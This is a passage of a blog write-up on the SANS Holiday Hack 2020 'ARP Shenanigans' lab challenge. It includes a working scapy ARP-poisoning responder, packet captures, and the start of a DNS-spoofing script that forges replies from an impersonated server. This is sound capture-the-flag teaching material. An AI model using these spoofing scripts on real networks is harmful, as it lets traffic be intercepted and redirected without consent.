&lt;span class="go"&gt;Great, you prepared all the present packets!&lt;/span&gt;

&lt;span class="go"&gt;Congratulations, all pretty present packets properly prepared for processing!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="arp-shenanigans"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id42"&gt;ARP Shenanigans&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;I think this challenge is the most fun of the bunch. We're told that Jack Frost
has hijacked a machine with IP address 10.6.6.35, and we're supposed to get
an access back to it. We're given a machine on the same network of our target.&lt;/p&gt;
&lt;p&gt;A help file is provided:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
# How To Resize and Switch Terminal Panes:

You can use the key combinations ( Ctrl+B ↑ or ↓ ) to resize the terminals.

You can use the key combinations ( Ctrl+B o ) to switch terminal panes.

See tmuxcheatsheet.com for more details

# To Add An Additional Terminal Pane:

`/usr/bin/tmux split-window -hb`

# To exit a terminal pane simply type:

`exit`

# To Launch a webserver to serve-up files/folder in a local directory:

```

cd /my/directory/with/files

python3 -m http.server 80

```

# A Sample ARP pcap can be viewed at:

https://www.cloudshark.org/captures/d97c5b81b057

# A Sample DNS pcap can be viewed at:

https://www.cloudshark.org/captures/0320b9b57d35

# If Reading arp.pcap with tcpdump or tshark be sure to disable name

# resolution or it will stall when reading:

```

tshark -nnr arp.pcap

tcpdump -nnr arp.pcap

```
&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;NB: the IP of my machine has changed several times during this challenge, so
you may see discrepancies between the different PCAPs or the results of&lt;/em&gt;
&lt;code&gt;ip&lt;/code&gt; &lt;em&gt;commands. However, our IP address is always in 10.6.0.0/24.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The challenge seems to be network oriented. Let's start with a simple network
capture with &lt;code&gt;tcpdump&lt;/code&gt;, while we ping the hijacked machine:&lt;/p&gt;
&lt;p&gt;In a term:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/pcaps$&lt;/span&gt; tcpdump -i eth0 -w ping.pcap
&lt;span class="go"&gt;tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In another:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; ping &lt;span class="m"&gt;10&lt;/span&gt;.6.6.35
&lt;span class="go"&gt;PING 10.6.6.35 (10.6.6.35) 56(84) bytes of data.&lt;/span&gt;
&lt;span class="go"&gt;64 bytes from 10.6.6.35: icmp_seq=1 ttl=64 time=0.128 ms&lt;/span&gt;
&lt;span class="go"&gt;64 bytes from 10.6.6.35: icmp_seq=2 ttl=64 time=0.171 ms&lt;/span&gt;
&lt;span class="go"&gt;64 bytes from 10.6.6.35: icmp_seq=3 ttl=64 time=0.143 ms&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's a link to &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/ping.pcap"&gt;ping.pcap&lt;/a&gt;.
We can see my &lt;code&gt;ping&lt;/code&gt; request, but that is not what's interesting in this
capture. We can see that our hijacked machine, 10.6.6.35, keeps sending ARP
requests for an IP address 10.6.6.53. We can guess that if it keeps sending
these requests, it's because the machine behind 10.6.6.53 is not responding.&lt;/p&gt;
&lt;img alt="arp_shenanigans_arp_requests.png" class="align-center" src="/images/sans-christmas-challenge-2020/arp_shenanigans_arp_requests.png" /&gt;
&lt;p&gt;This is the perfect set-up to perform an ARP poisoning attack: we can respond
to these requests to pretend that &lt;em&gt;we&lt;/em&gt; are the machine between 10.6.6.53. You
can read more about ARP poisoning on &lt;a class="reference external" href="https://fr.wikipedia.org/wiki/ARP_poisoning"&gt;Wikipedia&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Luckily for us, our machine has a skeleton of a Python script used to sniff
ARP requests. Here's a link to &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/arp_resp.py"&gt;arp_resp.py&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can see that we have to complete the different portions of the file. Let's
start by something simple. For now, our MAC address is randomly generated:
let's get the true MAC address of our &lt;code&gt;eth0&lt;/code&gt; interface:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;macaddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;get_if_hwaddr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;eth0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We must then complete different ARP fields in our response packet. Luckily,
we're provided with a PCAP with a valid ARP exchange. Here's a link to
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/arp.pcap"&gt;arp.pcap&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You can open it in Wireshark, but since we've had fun with scapy in the
previous task, let's use it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_packets&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;rdpcap&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./pcap/arp.pcap&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;arp_packets&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="c1"&gt;# the response is the second packet&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;op&lt;/span&gt;
&lt;span class="go"&gt;2&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;plen&lt;/span&gt;
&lt;span class="go"&gt;4&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwlen&lt;/span&gt;
&lt;span class="go"&gt;6&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ptype&lt;/span&gt;
&lt;span class="go"&gt;2048&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwtype&lt;/span&gt;
&lt;span class="go"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can now edit our script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;op&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;
&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;plen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;
&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwlen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt;
&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ptype&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2048&lt;/span&gt;
&lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwtype&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, onto the actual poisoning. We must find:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The MAC address of the machine who sent the request&lt;/li&gt;
&lt;li&gt;The IP address of the machine who sent the request&lt;/li&gt;
&lt;li&gt;The IP address they were trying to convert&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can find all these informations from the ARP request. Let's study the one
in our example &lt;code&gt;arp.pcap&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;arp_packets&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;arp_request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;show&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="go"&gt;###[ Ethernet ]###&lt;/span&gt;
&lt;span class="go"&gt;  dst       = ff:ff:ff:ff:ff:ff&lt;/span&gt;
&lt;span class="go"&gt;  src       = cc:01:10:dc:00:00&lt;/span&gt;
&lt;span class="go"&gt;  type      = ARP&lt;/span&gt;
&lt;span class="go"&gt;###[ ARP ]###&lt;/span&gt;
&lt;span class="go"&gt;     hwtype    = 0x1&lt;/span&gt;
&lt;span class="go"&gt;     ptype     = IPv4&lt;/span&gt;
&lt;span class="go"&gt;     hwlen     = 6&lt;/span&gt;
&lt;span class="go"&gt;     plen      = 4&lt;/span&gt;
&lt;span class="go"&gt;     op        = who-has&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;     hwsrc     = cc:01:10:dc:00:00&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;     psrc      = 10.10.10.2&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;     hwdst     = 00:00:00:00:00:00&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;     pdst      = 10.10.10.1&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;###[ Padding ]###&lt;/span&gt;
&lt;span class="go"&gt;        load      = &amp;#39;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can find:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The MAC address who sent the request in &lt;code&gt;arp_request.hwsrc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The IP address who sent the request in &lt;code&gt;arp_request.psrc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The IP address they were trying to convert in &lt;code&gt;arp_request.pdst&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can now finally complete our Python script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/python3&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;scapy.all&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;netifaces&lt;/span&gt; &lt;span class="kn"&gt;as&lt;/span&gt; &lt;span class="nn"&gt;ni&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;uuid&lt;/span&gt;

&lt;span class="c1"&gt;# Our eth0 ip&lt;/span&gt;
&lt;span class="n"&gt;ipaddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ni&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ifaddresses&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;eth0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="n"&gt;ni&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;addr&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="c1"&gt;# Our eth0 mac address&lt;/span&gt;
&lt;span class="n"&gt;macaddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;get_if_hwaddr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;eth0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;handle_arp_packets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# if arp request, then we need to fill this out to send back our mac as the response&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;ARP&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;packet&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;ARP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;op&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;ether_resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Ether&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwsrc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mh"&gt;0x806&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;macaddr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;arp_response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ARP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pdst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;psrc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;op&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;plen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwlen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ptype&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2048&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwtype&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwsrc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;macaddr&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;psrc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pdst&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwdst&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hwsrc&lt;/span&gt;
        &lt;span class="n"&gt;arp_response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pdst&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;psrc&lt;/span&gt;

        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ether_resp&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;arp_response&lt;/span&gt;

        &lt;span class="n"&gt;sendp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;iface&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;eth0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# We only want arp requests&lt;/span&gt;
    &lt;span class="n"&gt;berkeley_packet_filter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;(arp[6:2] = 1)&amp;quot;&lt;/span&gt;
    &lt;span class="c1"&gt;# sniffing for one packet that will be sent to a function, while storing none&lt;/span&gt;
    &lt;span class="n"&gt;sniff&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;filter&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;berkeley_packet_filter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prn&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;handle_arp_packets&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;store&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;__main__&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, we can launch our script, and perform another network capture:&lt;/p&gt;
&lt;p&gt;In a term:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/pcaps$&lt;/span&gt; tcpdump -i eth0 -w arp_poisoning.pcap
&lt;span class="go"&gt;tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In another:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/scripts$&lt;/span&gt; ./arp_resp.py
&lt;span class="go"&gt;.&lt;/span&gt;
&lt;span class="go"&gt;Sent 1 packets.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's a link to &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/arp_poisoning.pcap"&gt;arp_poisoning.pcap&lt;/a&gt;.&lt;/p&gt;
&lt;img alt="arp_shenanigans_arp_poisoning.png" class="align-center" src="/images/sans-christmas-challenge-2020/arp_shenanigans_arp_poisoning.png" /&gt;
&lt;p&gt;We can see that our ARP poisoning attack worked! Our hijacked machine received
our response, and then sent a DNS request to us, to resolve ftp.osuosl.org.
Now, that's interesting, cause we can pretend to be a DNS server, and send an
invalid DNS response, stating that ftp.osuosl.org resolves to &lt;em&gt;our own&lt;/em&gt; IP
address. That way, the hijacked machine will keep trying to connect to our own
machine, and we can study what it wants.&lt;/p&gt;
&lt;p&gt;Lucily for us, we're (again) given the skeleton to a Python script that can
sniff DNS requests and send a response. Here's a link to &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/dns_resp.py"&gt;dns_resp.py&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As before, we must complete the different parts of the script. First things
first, we must properly specify our MAC address, and the IP we spoofed:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# Our Mac Addr&lt;/span&gt;
&lt;span class="n"&gt;macaddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;get_if_hwaddr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;eth0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="c1"&gt;# destination ip we arp spoofed&lt;/span&gt;
&lt;span class="n"&gt;ipaddr_we_arp_spoofed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;10.6.6.53&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, we must build our packet from the ground up. We're gonna need:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Ethernet layer:
- A source MAC address
- A destination MAC address&lt;/li&gt;
&lt;li&gt;IP layer:
- A source IP address
- A destination IP address&lt;/li&gt;
&lt;li&gt;UDP layer:
- A source port
- A destination port&lt;/li&gt;
&lt;li&gt;DNS layer:
- A complete DNS response&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For the first three layers, we can get these information from our network
interface, or from the source packet:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Ether&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;macaddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# The source MAC address is our own, the destination is from the packet&lt;/span&gt;
&lt;span class="n"&gt;ip&lt;/span&gt;  &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ipaddr_we_arp_spoofed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# The source IP is the one we spoofed, the destination is from the packet&lt;/span&gt;
&lt;span class="n"&gt;udp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# We simply invert the source and destination ports from the original packet&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's build the DNS layer. What a stroke of luck, we're given a PCAP with
a valid DNS exchange! Here's a link to &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/dns.pcap"&gt;dns.pcap&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As before, let's take a look at it with scapy:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;dns_request&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DNS&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;show&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="go"&gt;###[ DNS ]###&lt;/span&gt;
&lt;span class="go"&gt;  id        = 30144&lt;/span&gt;
&lt;span class="go"&gt;  qr        = 0&lt;/span&gt;
&lt;span class="go"&gt;  opcode    = QUERY&lt;/span&gt;
&lt;span class="go"&gt;  aa        = 0&lt;/span&gt;
&lt;span class="go"&gt;  tc        = 0&lt;/span&gt;
&lt;span class="go"&gt;  rd        = 1&lt;/span&gt;
